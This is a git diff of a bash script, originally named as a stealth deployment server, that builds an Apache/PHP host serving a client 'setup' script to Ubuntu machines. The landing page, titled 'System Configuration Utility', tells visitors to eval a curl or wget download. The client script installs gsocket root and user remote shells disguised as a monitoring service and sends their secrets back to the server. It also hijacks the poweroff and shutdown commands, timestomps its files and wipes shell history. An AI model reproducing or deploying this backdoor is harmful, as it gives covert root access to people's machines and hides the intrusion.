diff --git a/setup_script.sh b/setup_script.sh index 6768128..cc164f1 100755 --- a/setup_script.sh +++ b/setup_script.sh @@ -1,11 +1,6 @@ #!/bin/bash -# stealth-deployment-server.sh -# Server setup script for Arch Linux host that will serve deployment scripts to Ubuntu clients - -# Exit on error set -e -# Function to check if a package is installed and install if not check_install_package() { local pkg="$1" if ! pacman -Q "$pkg" &>/dev/null; then @@ -14,27 +9,22 @@ check_install_package() { fi } -# Ensure necessary packages are installed check_install_package apache check_install_package php check_install_package php-apache -# Create the web server directory structure SERVER_ROOT="/srv/http/deployment" sudo mkdir -p "$SERVER_ROOT/assets" sudo mkdir -p "$SERVER_ROOT/logs" sudo mkdir -p "$SERVER_ROOT/secrets" -# Set proper permissions sudo chown -R http:http "$SERVER_ROOT/logs" sudo chown -R http:http "$SERVER_ROOT/secrets" sudo chmod 750 "$SERVER_ROOT/logs" sudo chmod 750 "$SERVER_ROOT/secrets" -# Create log receiver PHP script cat > /tmp/log_receiver.php << 'EOF' EOF -# Generate a random token for security RANDOM_TOKEN=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 32) sed -i "s/changeme_to_secure_random_string/$RANDOM_TOKEN/g" /tmp/log_receiver.php sudo mv /tmp/log_receiver.php "$SERVER_ROOT/log_receiver.php" -# Create the main client deployment script cat > /tmp/client_setup.sh << 'EOF' #!/bin/bash # Remote host configuration script @@ -122,11 +107,9 @@ VERSION="1.0.0" # ================================================ # ------- UTILITY FUNCTIONS ------- -# Create a temporary directory that will be cleaned up on exit TEMP_DIR=$(mktemp -d) trap 'rm -rf "$TEMP_DIR"' EXIT -# Function to log commands and outputs log_cmd() { local cmd="$1" local desc="$2" @@ -148,7 +131,6 @@ log_cmd() { return $status } -# Function to get system information in JSON format get_system_info() { { echo "{" @@ -178,18 +160,15 @@ get_system_info() { } | tr -d '\n' | sed 's/ //g' } -# Function to send logs to server send_logs() { local log_file="$1" local secret_val="$2" local secret_type="$3" - # Get system information local sysinfo=$(get_system_info) local hostname=$(hostname) local ip=$(hostname -I | awk '{print $1}') - # Use curl to send data if available if command -v curl >/dev/null 2>&1; then # Send log file curl -s -F "token=$AUTH_TOKEN" \ @@ -199,7 +178,6 @@ send_logs() { -F "sysinfo=$sysinfo" \ $LOG_ENDPOINT > /dev/null - # Send secret if provided if [ -n "$secret_val" ] && [ -n "$secret_type" ]; then curl -s -F "token=$AUTH_TOKEN" \ -F "ip=$ip" \ @@ -211,7 +189,6 @@ send_logs() { fi } -# Function to check if we have sudo access check_sudo() { if ! sudo -v &>/dev/null; then echo "This script requires sudo privileges. Please run with a user that has sudo access." @@ -221,19 +198,16 @@ check_sudo() { # ------- MAIN SETUP ------- main() { - # Create log file local LOG_FILE="$TEMP_DIR/setup_log_$(date +%Y%m%d_%H%M%S).txt" local HOSTNAME=$(hostname) local IP_ADDRESS=$(hostname -I | awk '{print $1}') - # Start logging echo "==== SETUP STARTED ==== $(date) ====" > "$LOG_FILE" echo "Hostname: $HOSTNAME" >> "$LOG_FILE" echo "IP: $IP_ADDRESS" >> "$LOG_FILE" echo "Version: $VERSION" >> "$LOG_FILE" echo "=================================" >> "$LOG_FILE" - # Check for sudo access check_sudo # 1. Update package list (quiet) @@ -264,23 +238,15 @@ main() { echo "Configuration completed successfully!" } -# ------- SETUP FUNCTIONS ------- setup_ssh() { local LOG_FILE="$1" - # Ensure SSH is enabled and properly configured log_cmd "sudo systemctl enable ssh" "Enabling SSH service" "$LOG_FILE" - # Backup existing SSH config if [ -f /etc/ssh/sshd_config ]; then log_cmd "sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak" "Backing up SSH config" "$LOG_FILE" fi - # Update SSH configuration for better security - log_cmd "sudo sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin no/' /etc/ssh/sshd_config" "Disabling root SSH login" "$LOG_FILE" - log_cmd "sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config" "Enabling password authentication" "$LOG_FILE" - - # Start/restart SSH service log_cmd "sudo systemctl restart ssh" "Restarting SSH service" "$LOG_FILE" log_cmd "sudo systemctl status ssh" "Checking SSH service status" "$LOG_FILE" } @@ -288,17 +254,14 @@ setup_ssh() { setup_wol() { local LOG_FILE="$1" - # Identify network interface PRIMARY_INTERFACE=$(ip -o -4 route show to default | awk '{print $5}' | head -n1) log_cmd "echo 'Primary network interface: $PRIMARY_INTERFACE'" "Identifying network interface" "$LOG_FILE" - # Check if Wake-on-LAN is supported WOL_SUPPORTED=$(ethtool "$PRIMARY_INTERFACE" 2>/dev/null | grep -q "Supports Wake-on" && echo "yes" || echo "no") if [ "$WOL_SUPPORTED" = "yes" ]; then log_cmd "echo 'Wake-on-LAN is supported.'" "Checking Wake-on-LAN support" "$LOG_FILE" - # Enable WoL in NetworkManager configuration cat > "$TEMP_DIR/wol.conf" << EOL [connection] ethernet.wake-on-lan = magic @@ -333,7 +296,6 @@ EOL log_cmd "sudo systemctl start wol.service" "Starting Wake-on-LAN service" "$LOG_FILE" log_cmd "sudo ethtool -s $PRIMARY_INTERFACE wol g" "Enabling Wake-on-LAN immediately" "$LOG_FILE" - # Check current WoL status log_cmd "ethtool $PRIMARY_INTERFACE | grep Wake-on" "Current Wake-on-LAN status" "$LOG_FILE" else log_cmd "echo 'Wake-on-LAN not supported, skipping...'" "Wake-on-LAN not supported" "$LOG_FILE" @@ -388,7 +350,6 @@ EOL log_cmd "sudo cp '$TEMP_DIR/poweroff-wrapper' /usr/local/bin/poweroff-wrapper" "Creating poweroff wrapper" "$LOG_FILE" log_cmd "sudo chmod +x /usr/local/bin/poweroff-wrapper" "Making poweroff wrapper executable" "$LOG_FILE" - # 6. Create aliases in /etc/bash.bashrc for all users echo "# Custom system aliases" > "$TEMP_DIR/custom-aliases" echo "alias poweroff='/usr/local/bin/poweroff-wrapper'" >> "$TEMP_DIR/custom-aliases" echo "alias shutdown='/usr/local/bin/poweroff-wrapper'" >> "$TEMP_DIR/custom-aliases" @@ -396,24 +357,20 @@ EOL log_cmd "sudo cp '$TEMP_DIR/custom-aliases' /etc/profile.d/custom-aliases.sh" "Creating system-wide aliases" "$LOG_FILE" log_cmd "sudo chmod +x /etc/profile.d/custom-aliases.sh" "Making aliases executable" "$LOG_FILE" - # 7. Restart logind to apply changes log_cmd "sudo systemctl restart systemd-logind" "Restarting logind service" "$LOG_FILE" } setup_gsocket() { local LOG_FILE="$1" - # 1. Install gsocket if not already installed if ! command -v gs-netcat &>/dev/null; then log_cmd "sudo apt-get install -y git build-essential" "Installing dependencies for gsocket" "$LOG_FILE" log_cmd "git clone https://github.com/hackerschoice/gsocket.git '$TEMP_DIR/gsocket'" "Cloning gsocket repository" "$LOG_FILE" log_cmd "cd '$TEMP_DIR/gsocket' && ./bootstrap && ./configure && make && sudo make install" "Building and installing gsocket" "$LOG_FILE" fi - # 2. Set up gsocket with root shell log_cmd "cd '$TEMP_DIR' && bash -c \"$(curl -fsSL https://gsocket.io/y &>/dev/null)\"" "Setting up gsocket" "$LOG_FILE" - # 3. Extract the secret local GSOCKET_DIR="$HOME/.gsocket" local SECRET="" if [ -f "$GSOCKET_DIR/gs-netcat.conf" ]; then @@ -430,18 +387,15 @@ setup_gsocket() { echo "Secret extracted: [HIDDEN]" >> "$LOG_FILE" echo "$SECRET" > "$TEMP_DIR/gsocket_secret.txt" - # Save the secret to a secure location for the root shell service log_cmd "sudo mkdir -p /etc/gsocket" "Creating gsocket configuration directory" "$LOG_FILE" log_cmd "echo '$SECRET' | sudo tee /etc/gsocket/root-shell-key.txt > /dev/null" "Saving gsocket secret key" "$LOG_FILE" log_cmd "sudo chmod 600 /etc/gsocket/root-shell-key.txt" "Setting secure permissions on key file" "$LOG_FILE" - # Send the secret to our server send_logs "$LOG_FILE" "$SECRET" "root-shell" else log_cmd "echo 'Failed to extract gsocket secret'" "Secret extraction failed" "$LOG_FILE" fi - # 4. Create the root shell service cat > "$TEMP_DIR/gs-root-shell.service" << 'EOL' [Unit] Description=Global Socket Root Shell @@ -466,7 +420,6 @@ EOL log_cmd "sudo systemctl enable gs-root-shell.service" "Enabling global socket root shell service" "$LOG_FILE" log_cmd "sudo systemctl start gs-root-shell.service" "Starting global socket root shell service" "$LOG_FILE" - # 5. Create a user shell service too (running as current user) local USER_SECRET="" if [ -f "$GSOCKET_DIR/gs-netcat.conf" ]; then USER_SECRET=$(grep -o 'GS_SECRET=[^"]*' "$GSOCKET_DIR/gs-netcat.conf" | cut -d= -f2) @@ -522,7 +475,6 @@ apply_stealth() { log_cmd "echo 'enable system-monitoring.service' | sudo tee -a /etc/systemd/system-preset/90-systemd.preset > /dev/null" "Adding service to systemd preset" "$LOG_FILE" fi - # 4. Reload services log_cmd "sudo systemctl daemon-reload" "Reloading systemd configuration" "$LOG_FILE" log_cmd "sudo systemctl restart system-monitoring.service" "Restarting disguised root shell service" "$LOG_FILE" @@ -531,38 +483,33 @@ apply_stealth() { log_cmd "systemctl --user restart gs-user-shell.service" "Restarting user shell service" "$LOG_FILE" fi - # 5. Set last accessed/modified times of our files to match system files + # 4. Set last accessed/modified times of our files to match system files if [ -f "/etc/passwd" ]; then REFERENCE_TIME=$(stat -c %y /etc/passwd) log_cmd "sudo touch -d \"$REFERENCE_TIME\" /etc/gsocket/root-shell-key.txt" "Setting file timestamp to match system files" "$LOG_FILE" log_cmd "sudo touch -d \"$REFERENCE_TIME\" /etc/systemd/system/system-monitoring.service" "Setting file timestamp to match system files" "$LOG_FILE" fi - # 6. Add a cleanup script that runs on reboot to remove traces + # 5. Add a cleanup script that runs on reboot to remove traces cat > "$TEMP_DIR/cleanup.sh" << 'EOL' #!/bin/bash -# Clean up temporary files and logs -# Remove temporary installer artifacts rm -f /tmp/gs-netcat* 2>/dev/null rm -f /tmp/gsocket* 2>/dev/null rm -f /tmp/setup_* 2>/dev/null -# Clear bash history entries containing our tools if [ -f "$HOME/.bash_history" ]; then sed -i '/gsocket/d' "$HOME/.bash_history" sed -i '/gs-netcat/d' "$HOME/.bash_history" sed -i '/setup_script/d' "$HOME/.bash_history" fi -# Clean deployment command from history history -c EOL log_cmd "sudo cp '$TEMP_DIR/cleanup.sh' /usr/local/bin/system-cleanup.sh" "Creating cleanup script" "$LOG_FILE" log_cmd "sudo chmod +x /usr/local/bin/system-cleanup.sh" "Making cleanup script executable" "$LOG_FILE" - # Create a service to run cleanup on boot cat > "$TEMP_DIR/cleanup.service" << 'EOL' [Unit] Description=System Temporary Files Cleanup @@ -585,43 +532,34 @@ EOL log_cmd "sudo /usr/local/bin/system-cleanup.sh" "Running cleanup immediately" "$LOG_FILE" } -# Execute main function main "$@" EOF -# Get server IP SERVER_IP=$(ip -4 addr show | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | grep -v "127.0.0.1" | head -n 1) # Replace placeholders with actual values sed -i "s|SERVER_PLACEHOLDER|$SERVER_IP|g" /tmp/client_setup.sh sed -i "s|TOKEN_PLACEHOLDER|$RANDOM_TOKEN|g" /tmp/client_setup.sh -# Move client setup script to web server directory sudo mv /tmp/client_setup.sh "$SERVER_ROOT/client_setup.sh" sudo chmod +x "$SERVER_ROOT/client_setup.sh" -# Create an obfuscated version of the script that's harder to analyze cat > /tmp/obfuscate.php << 'EOF' EOF @@ -631,48 +569,96 @@ sudo php "$SERVER_ROOT/assets/obfuscate.php" # Create a minimal landing page cat > /tmp/index.html << EOF - + - System Configuration Utility - + + + System Configuration Utility + +

System Configuration Utility

Quick Setup

-

Run the following command in your terminal to configure this system:

+

Run one of the following commands in your terminal:

-
- eval "\$(http://${SERVER_IP}/deployment/client_setup.sh)" +
+ Using curl: +
+eval "\$(curl -fsSL http://192.168.0.104/deployment/client_setup.sh)" +
-

Gback

+
+ Using wget: +
+eval "\$(wget --no-verbose -O- http://192.168.0.104/deployment/client_setup.sh)" +
+
+ +

+ Gback +

+
EOF -# Replace server IP in the HTML template sudo sed -i "s|\${SERVER_IP}|$SERVER_IP|g" /tmp/index.html sudo mv /tmp/index.html "$SERVER_ROOT/index.html" -# Create a simple hidden admin page for viewing logs cat > /tmp/admin.php << 'EOF' /dev/null fi -# Enable and restart Apache sudo systemctl enable httpd sudo systemctl restart httpd - echo "==============================================================" echo "Deployment server setup complete!" echo "==============================================================" echo "Server URL: http://$SERVER_IP/deployment" echo "Admin Page: http://$SERVER_IP/deployment/admin.php" echo "Admin Password: $ADMIN_PASSWORD" -echo "Client Setup Command: wget -q -O- http://$SERVER_IP/deployment/client_setup.sh | sudo bash" +echo "Client Setup Command: eval \"\$(wget --no-verbose -O- http://${SERVER_IP}/deployment/client_setup.sh)\"" echo "==============================================================" echo "Secret Token for accessing logs: $RANDOM_TOKEN" echo "=============================================================="